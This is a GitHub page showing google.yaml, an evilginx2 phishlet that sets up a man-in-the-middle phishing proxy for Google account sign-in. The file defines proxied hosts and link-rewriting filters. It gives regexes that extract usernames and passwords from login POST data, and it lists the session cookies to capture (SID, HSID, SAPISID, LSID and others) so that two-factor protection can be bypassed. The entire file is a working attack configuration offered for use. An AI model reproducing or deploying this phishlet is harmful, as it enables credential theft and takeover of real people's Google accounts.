-
Notifications
You must be signed in to change notification settings - Fork 5
/
google.yaml
34 lines (34 loc) · 2.56 KB
/
google.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
name: 'google'
author: '@asmc'
min_ver: '2.2.0'
proxy_hosts:
- {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true}
- {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false}
#- {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: false, is_landing: false}
# Suggest: run command below evilginx2 console: phishlets get-url google https://myaccount.google.com/xxxxxxx, replace xxxxx to normal function url as your choice in the google account page
- {phish_sub: 'www', orig_sub: 'www', domain: 'gstatic.com', session: true, is_landing: false}
sub_filters:
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/', replace: 'https://{hostname}/signin/', mimes: ['text/html', 'application/json']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/speedbump/', replace: 'https://{hostname}/speedbump/', mimes: ['text/html', 'application/json']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
- {triggers_on: 'accounts.google.com', orig_sub: 'myaccount', domain: 'google.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json']}
- {triggers_on: 'accounts.google.com', orig_sub: 'ssl', domain: 'gstatic.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
- {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/CheckCookie', replace: 'https://{hostname}/CheckCookie', mimes: ['text/html', 'application/json']}
- {triggers_on: 'ssl.gstatic.com', orig_sub: 'accounts', domain: 'google.com', search: 'href="http://{hostname}/_/signin/challenge', replace: 'href="http://{hostname}/_/signin/challenge', mimes: ['text/html', 'application/json']}
- {triggers_on: 'ssl.gstatic.com', orig_sub: 'ssl', domain: 'gstatic.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
auth_tokens:
- domain: '.google.com'
keys: ["SID", "HSID", "SSID", "APISID", "SAPISID", "NID"]
- domain: 'accounts.google.com'
keys: ["GAPS", "LSID"]
credentials:
username:
key: 'f.req'
search: '\],"([^"]*)"\]$'
type: 'post'
password:
key: 'f.req'
search: ',\["([^"]*)",'
type: 'post'
landing_path:
- '/signin/v2/identifier'